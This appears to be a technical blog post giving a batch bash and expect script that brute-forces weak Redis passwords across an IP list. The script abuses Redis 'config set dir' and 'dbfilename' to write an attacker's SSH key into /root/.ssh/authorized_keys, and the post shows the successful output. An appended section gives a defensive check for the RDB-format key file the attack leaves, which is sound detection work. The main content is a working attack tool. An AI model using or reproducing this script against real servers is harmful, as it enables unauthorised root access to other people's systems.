1. Implementing a Redis reverse shell with a shell script
```
[root@xingcheng attack]# cat shell_rebound.sh
#!/bin/bash
##create by xingcheng
##20180403
##function: batch Redis reverse shell to obtain system privileges; mainly targets Redis servers with no security policy and Redis servers with weak passwords, which often run as the root account
#ip_list=(39.106.107.229 123.206.31.161 127.0.0.1)
#password_dict=(123456 abcdef 234rdffs)
ip_list=(127.0.0.1 192.168.0.1)           # IP list array; IPs can be stored in bulk
password_dict=(123456 abcdefg 1qaz2wsx)   # weak-password array

password(){
  for passwd in ${password_dict[@]}
  do
    expect shell_rebound.exp "$ip" "$passwd"
    echo $(cat /root/.ssh/authorized_keys)
  done
}

ip(){
  for ip in ${ip_list[@]}
  do
    password
  done
}

ip
```
```
[root@xingcheng attack]# cat shell_rebound.exp
#!/usr/bin/expect
set sentence1 [lindex $argv 0]
set sentence2 [lindex $argv 1]
spawn /usr/local/redis/bin/redis-cli -h $sentence1 -p 6379 -a $sentence2
expect "127.0.0.1:6379>"
if { $sentence1==$sentence1 } {
  send "set -.- \"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAltEC9ktb+401+epwi/QxYKoTLYiHaJ9RREnHzPfMzs107ba9otiT6iiiFDJtXnvAWkp6vMDJ59ncJUNCFmPjReK521DP5cmVg5V7un71GhFEybZ8oGzEFWeYPhXp+vBK0VW1btPl7GaLs5DU1bKDpmPPFURWFIw77pd8CFeYXjLBssmQgvm3szk2VxD2gw2DAQa6+cLGtjRMmWgD2QRG7gkMoRotkfoxkqwESuBedspm0unB7eQHfXvMznntnwTzwDW1E70BMAvk4bnoJnBGnZep2SBxNUn9H6a7mcGyD6FDQ6TQClc9KeXNiq/mqTa0X6jCLzF0GsYl0mQHcAF7DQ== rsa-key-20180320\n\n\n\" \r"
  send "config set dir /root/.ssh \r"
  send "config set dbfilename authorized_keys \r"
  send "save \r"
}
expect eof
```
The result on success: passwordless login to the server succeeds.
```
[root@xingcheng attack]# cat /root/.ssh/authorized_keys
REDIS0008 redis-ver4.0.6 redis-bits����e.used-mem¸þ ��preamble~��-A

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAltEC9ktb+401+epwi/QxYKoTLYiHaJ9RREnHzPfMzs107ba9otiT6iiiFDJtXnvAWkp6vMDJ59ncJUNCFmPjReK521DP5cmVg5V7un71GhFEybZ8oGzEFWeYPhXp+vBK0VW1btPl7GaLs5DU1bKDpmPPFURWFIw77pd8CFeYXjLBssmQgvm3szk2VxD2gw2DAQa6+cLGtjRMmWgD2QRG7gkMoRotkfoxkqwESuBedspm0unB7eQHfXvMznntnwTzwDW1E70BMAvk4bnoJnBGnZep2SBxNUn9H6a7mcGyD6FDQ6TQClc9KeXNiq/mqTa0X6jCLzF0GsYl0mQHcAF7DQ== rsa-key-20180320
```
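The `cat` output above shows the artifact this technique leaves on the host: an `authorized_keys` file that is really a Redis RDB dump, starting with `REDIS0008`. The check below for that artifact is an added example, not part of the original post; the helper name `check_authorized_keys` is hypothetical.

```shell
#!/bin/sh
# Added defensive example (not from the original post).
# Flags authorized_keys files that are actually Redis RDB dumps, the artifact
# left when Redis SAVEs with dir=/root/.ssh and dbfilename=authorized_keys.
# check_authorized_keys is a hypothetical helper name.

# Prints one verdict line.
# Exit status: 0 = clean, 1 = RDB dump found, 2 = missing or unreadable.
check_authorized_keys() {
    file=$1
    if [ ! -f "$file" ] || [ ! -r "$file" ]; then
        echo "UNREADABLE $file"
        return 2
    fi
    # An RDB file starts with the ASCII magic "REDIS" plus a 4-digit version.
    magic=$(LC_ALL=C head -c 9 "$file" | tr -d '\000')
    case $magic in
        REDIS[0-9][0-9][0-9][0-9])
            # -a: treat the binary dump as text; count public-key lines in it.
            keys=$(LC_ALL=C grep -a -c -E \
                '^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-[a-z0-9-]+) ' "$file" || true)
            echo "SUSPICIOUS $file rdb_version=${magic#REDIS} embedded_keys=$keys"
            return 1
            ;;
    esac
    echo "OK $file"
    return 0
}

# Usage: sh check_rdb_keys.sh /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys
for f in "$@"; do
    check_authorized_keys "$f" || true
done
```

A `SUSPICIOUS` verdict means the file was written by a Redis `SAVE`; the Redis instance on that host should then be checked for the conditions the script above relies on: no password or a weak one, and a server process running as root.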